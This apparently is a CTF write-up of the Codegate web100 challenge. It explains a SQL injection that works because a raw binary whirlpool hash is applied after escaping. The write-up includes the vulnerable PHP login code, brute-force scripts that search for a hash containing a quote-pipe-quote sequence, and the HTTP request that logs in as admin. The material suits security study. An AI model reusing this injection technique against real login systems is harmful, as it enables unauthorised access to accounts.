Recently we took part in Codegate’s CTF. we’ve mostly worked on web section and today I would share what we’ve done. There were 5 web challenges and score points begun from 100 to 500. we (ha.cker.ir + ctf.ir) accomplished solving three challenges. The challenges are currently available here. By the way, the rest of challenges (two) weren’t much difficult, we found blind MySQL injection in web300, although we didn’t succeed in exploiting it (because it was time-based and our internet connection was semi-slow, we used server and the result was same). And there was another Blind injection in web400 which I’m looking forward to seeing its write-up. In the rest of this update, I will indicate to solutions of question solved by us.
Web 100
The source code of challenge was given, there wasn’t anything interesting in code but following lines:
insert into users values (null, 'admin', 'f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f');
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);
if (isset($row['user_id'])) {
if ($row['user_id'] == "admin") {
echo "hello, admin
";
die(file_get_contents($flag));
} else {
die("hello, ".$row['user_id']);
}
} else {
msg("login failed..");
}
In line 4 $ps variable goes into mysql_real_escape_string() so it seems to be secure in a glance, however it isn’t because escaped string goes into hash() function and it becomes encrypted. Apparently, there is no grantee that encrypted string doesn’t have have quote. I put little effort on query and I found out that ‘|’ (after encryption of password) will bring a successful login:
select * from users where user_id='admin' and user_ps='blah'|'blah'
The statement is true and it returns a row in MySQL. Line 16 only checks the user_id so I wasn’t worry about password. I immediately wrote a small php script in order to find password making me login:
<?php
$a = 'a';
while(TRUE)
{
$hash = hash("whirlpool",$a, true);
echo "$a\n";
if( substr_count( $hash, "'|'" ) > 0 ) die($a);
$a++;
}
?>
It found ecdx, Since it has an extra quote (), I couldn’t login with it!
<?php
echo $hash = hash("whirlpool",'wwqr',TRUE); // Prints ═╡dX█r╧ü─▀⌐}o£R¢\≈─φ╜D'|'ëâÖ/▄¶Y$â└!ε▄Ω8èDl`BI-≡î▼]3tδ\a╧♦▓X▒$'P
I changed the script:
<?php
$a = 'a';
while(TRUE)
{
if($a != 'ecdx')
{
$hash = hash("whirlpool",$a, true);
echo "$a\n";
if( substr_count( $hash, "'|'" ) > 0 ) die($a);
$a++;
}
}
?>
And it gave me wwqr so I accomplished accessing flag:
POST /site/login_check.php HTTP/1.1 Host: 58.229.122.16:31940 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://58.229.122.16:31940/site/login.php.htm Connection: keep-alive Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 158 auto_login=1&page=&id=Free_Board&no=&select_arrange=&desc=&page_num=&keyword=&category=&sn=&ss=&sc=&mode=&s_url=&referer=&user_id=admin&password=wwqr&x=36&y=9
Image may be NSFW.
Clik here to view.